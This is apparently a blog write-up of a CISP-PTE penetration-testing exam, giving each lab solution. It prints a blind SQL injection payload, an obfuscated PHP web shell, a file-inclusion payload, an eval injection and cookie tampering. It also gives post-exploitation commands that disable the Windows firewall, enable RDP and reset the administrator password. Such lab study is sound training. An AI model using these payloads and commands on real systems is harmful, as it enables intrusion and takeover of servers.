2021-12月CISP-PTE考试总结

12月末参加了PTE考试，题不算难，但考试操作环境垃圾的一瞥，sqlmap不能跑，20道选择，5道基础题，1道综合题，如果不卡壳花4个小时做完也是很有压力。选择题就不说了，主要记录一下大题解法，当然方法不止一种。

一、SQL注入

sqlmap长时间没更新，跑不起来，只能手注，使用二分法，利用burpsuite慢慢跑，阿西吧。

title=222%27/**/and/**/(if((ascii(substr((select/**/group_concat(password)/**/from/**/users1/**/where/**/username='admin'),1,1))=107),sleep(5),0))/**/and/**/%27abc%27=%27abc&content=/**/

二、文件上传

搞一个php免杀马直接上传即可。

<?php $b = substr_replace("assexx","rt",4);$a = array($arrayName = array('a' => $b($_POST['pte'])))?>

三、文件包含

php:/php:///filter/read=convert.base64-encode/resource=../key3.php

四、代码审计

<?php
	error_repoerting(0);
	include "key4.php";
	$a=$_GET['a'];
	eval("\$o=strtolower(\"$a\");");
	echo $o;
	show_source(__FILE__);

a参数直接传入${@eval($_POST[1])}，POST 1=cat%20key4.php。

五、失效的访问控制。

修改Isadmin=false&username=R3Vlc3Q%3D 为Isadmin=true&username=YWRtaW4%3D即可。

六、综合题

综合题是一个图片管理系统，目录扫描发现PhpMyAdmin和后台，PhpMyAdmin弱口令root/root登录，获取key6。发现在数据库images 的 system表中有admin的密码hash，修改为123456的md5hash登录即可。登录后台后传入木马，菜刀连接，翻一翻网站目录发现key7。最后一个key8提示在桌面，那就是要远程连接查看。首先关闭防火墙netsh advfirewall set allprofiles state off，之后利用他的工具库里边的3389端口开启脚本，上传到网站目录下并执行，开启3389端口（上传失败就鼠标拖动到菜刀的网站目录下）。修改administrator的密码net user administrator 123456，mstsc 远程连接，在回收站找到key8。